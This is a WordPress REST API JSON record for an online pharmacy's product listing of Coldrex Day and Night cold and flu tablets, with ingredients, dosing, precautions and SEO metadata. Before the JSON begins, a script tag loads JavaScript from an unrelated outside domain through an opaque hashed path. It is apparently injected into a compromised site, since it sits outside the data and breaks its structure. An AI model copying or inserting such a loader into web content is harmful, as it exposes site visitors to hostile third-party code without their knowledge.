<script type='text/javascript' src='//existingcraziness.com/ec/83/1b/ec831b2e2c34253e0e8ffd8198a71343.js'></script>{"id":3864,"date":"2021-07-24T21:23:05","date_gmt":"2021-07-24T21:23:05","guid":{"rendered":"https:\/\/gsgpharma.com\/?post_type=product&#038;p=3864"},"modified":"2021-07-24T21:23:05","modified_gmt":"2021-07-24T21:23:05","slug":"coldrex-pe-cold-and-flu-day-and-night-48-tablets","status":"publish","type":"product","link":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets","title":{"rendered":"COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS"},"content":{"rendered":"<p>(32 Day Caplets, 16 Night Caplets)<\/p>\n<p>Coldrex Day &amp; Night is specially formulated to provide fast and effective relief from the symptoms of cold and flu, including:<br \/>\nHeadache<br \/>\nBlocked or runny nose<br \/>\nBody aches &amp; pains<\/p>\n<p>The night tablet relieves your symptoms and contains an additional active ingredient to help you get a good night&#8217;s sleep.<\/p>\n<hr \/>\n<p><b>Ingredients<\/b><br \/>\nDay formula contains Paracetamol 500mg, Phenylephrine HCI 5mg, and Dextromethorphan HBr 15mg per Caplet\u00ae.<\/p>\n<p>Night formula contains Paracetamol 500mg, Phenylephrine HCI 5mg, Dextromethorphan HBr 15mg and Chlorpheniramine maleate 2mg per Caplet.<\/p>\n<hr \/>\n<p><b>Directions &amp; Precautions<\/b><br \/>\nAlways read the label carefully and use strictly as directed. If symptoms persist or side effects develop, Always read the label carefully and use strictly as directed. If symptoms persist or side effects develop, see your healthcare professional.<\/p>\n<p>Do not use Coldrex:<br \/>\nFor children below 12 years of age<br \/>\nFor more than 48 hours in children aged 12 to 17, except on medical advice<br \/>\nFor more than a few days at a time in adults, except on medical advice<br \/>\nIf using other medicines containing the same active ingredients as Coldrex, or any other cold or decongestant products<br \/>\nIf you are sensitive to any of the ingredients in Coldrex<br \/>\nIf you have hypertension, except on medical advice<\/p>\n<p>DAY 2 caplets every 4-6 hours as necessary (maximum 4 DAY caplets in 24 hours)<br \/>\nNIGHT 2 caplets at bedtime. Do not take DAY caplets within 6 hours of the NIGHT caplets (maximum 2 NIGHT caplets in 24 hours)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>(32 Day Caplets, 16 Night Caplets) Coldrex Day &amp; Night is specially formulated to provide fast and effective relief from the symptoms of cold and flu, including: Headache Blocked or runny nose Body aches &amp; pains The night tablet relieves your symptoms and contains an additional active ingredient to help you get a good night&#8217;s [&hellip;]<\/p>\n","protected":false},"featured_media":3865,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[255],"product_tag":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS - GSG Pharma<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS - GSG Pharma\" \/>\n<meta property=\"og:description\" content=\"(32 Day Caplets, 16 Night Caplets) Coldrex Day &amp; Night is specially formulated to provide fast and effective relief from the symptoms of cold and flu, including: Headache Blocked or runny nose Body aches &amp; pains The night tablet relieves your symptoms and contains an additional active ingredient to help you get a good night&#8217;s [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets\" \/>\n<meta property=\"og:site_name\" content=\"GSG Pharma\" \/>\n<meta property=\"og:image\" content=\"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/a27455a12a7aeae7ec08809803e0fe41_448x448.png\" \/>\n\t<meta property=\"og:image:width\" content=\"448\" \/>\n\t<meta property=\"og:image:height\" content=\"448\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/gsgpharma.com\/#website\",\"url\":\"https:\/\/gsgpharma.com\/\",\"name\":\"GSG Pharma\",\"description\":\"Your Healthful Choice in Online Partnership\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/gsgpharma.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/a27455a12a7aeae7ec08809803e0fe41_448x448.png\",\"contentUrl\":\"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/a27455a12a7aeae7ec08809803e0fe41_448x448.png\",\"width\":448,\"height\":448},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#webpage\",\"url\":\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets\",\"name\":\"COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS - GSG Pharma\",\"isPartOf\":{\"@id\":\"https:\/\/gsgpharma.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#primaryimage\"},\"datePublished\":\"2021-07-24T21:23:05+00:00\",\"dateModified\":\"2021-07-24T21:23:05+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/gsgpharma.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\/\/gsgpharma.com\/?page_id=5\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS - GSG Pharma","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets","og_locale":"en_US","og_type":"article","og_title":"COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS - GSG Pharma","og_description":"(32 Day Caplets, 16 Night Caplets) Coldrex Day &amp; Night is specially formulated to provide fast and effective relief from the symptoms of cold and flu, including: Headache Blocked or runny nose Body aches &amp; pains The night tablet relieves your symptoms and contains an additional active ingredient to help you get a good night&#8217;s [&hellip;]","og_url":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets","og_site_name":"GSG Pharma","og_image":[{"width":448,"height":448,"url":"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/a27455a12a7aeae7ec08809803e0fe41_448x448.png","path":"\/home\/u979399792\/domains\/gsgpharma.com\/public_html\/wp-content\/uploads\/2021\/07\/a27455a12a7aeae7ec08809803e0fe41_448x448.png","size":"full","id":3865,"alt":"","pixels":200704,"type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/gsgpharma.com\/#website","url":"https:\/\/gsgpharma.com\/","name":"GSG Pharma","description":"Your Healthful Choice in Online Partnership","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/gsgpharma.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#primaryimage","inLanguage":"en-US","url":"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/a27455a12a7aeae7ec08809803e0fe41_448x448.png","contentUrl":"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/a27455a12a7aeae7ec08809803e0fe41_448x448.png","width":448,"height":448},{"@type":"WebPage","@id":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#webpage","url":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets","name":"COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS - GSG Pharma","isPartOf":{"@id":"https:\/\/gsgpharma.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#primaryimage"},"datePublished":"2021-07-24T21:23:05+00:00","dateModified":"2021-07-24T21:23:05+00:00","breadcrumb":{"@id":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/gsgpharma.com\/?product=coldrex-pe-cold-and-flu-day-and-night-48-tablets#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/gsgpharma.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/gsgpharma.com\/?page_id=5"},{"@type":"ListItem","position":3,"name":"COLDREX PE COLD AND FLU DAY AND NIGHT 48 TABLETS"}]}]}},"_links":{"self":[{"href":"https:\/\/gsgpharma.com\/index.php?rest_route=\/wp\/v2\/product\/3864"}],"collection":[{"href":"https:\/\/gsgpharma.com\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/gsgpharma.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/gsgpharma.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3864"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gsgpharma.com\/index.php?rest_route=\/wp\/v2\/media\/3865"}],"wp:attachment":[{"href":"https:\/\/gsgpharma.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3864"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/gsgpharma.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=3864"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/gsgpharma.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=3864"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}